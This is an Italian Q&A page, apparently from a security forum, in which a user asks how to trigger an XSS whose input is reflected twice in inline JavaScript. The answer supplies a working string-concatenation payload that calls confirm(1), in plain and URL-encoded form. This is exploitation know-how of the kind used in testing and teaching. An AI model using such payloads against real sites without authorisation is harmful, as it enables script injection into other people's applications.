Attivare un XSS quando il payload appare due volte?

Question

Attivare un XSS quando il payload appare due volte?

#1 da (1 voti)

0

Ho trovato una vulnerabilità XXS, ma non sono in grado di sfruttarla. Il mio input, 66038');}confirm(1);/* , appare due volte. L'idea era di chiudere la funzione foo1() e attivare confirm(1) . Ma foo2 è il problema. Non è possibile inizializzare foo_var con lo stesso carico utile. Il carattere ) è il problema. Qualche idea?

function foo1(){

    if('EUR66038');}confirm(1);/* != 'blabla'



 /*
    Some comments
   */


function foo2()
{
    var foo_var= 'EUR66038');}confirm(1);/* //Comment
...

web-application xss

posta aaa bbb 04.12.2018 - 21:19

fonte

1 risposta

Leggi altre domande sui tag web-application xss

Utilizzando l'autenticazione di terze parti come google / facebook per accedere a un sito, esiste un rischio per la sicurezza quando il sito viene violato? TLS1.2, suite cypher deboli e conformità PCI DSS V3.2.1

score 1 · Answer 1

1

Il seguente carico utile funzionerà:

EUR66038'+confirm(1)+'820

Versione codificata:

EUR66038%27%2Bconfirm(1)%2B%27820

risposta data 05.12.2018 - 06:30

fonte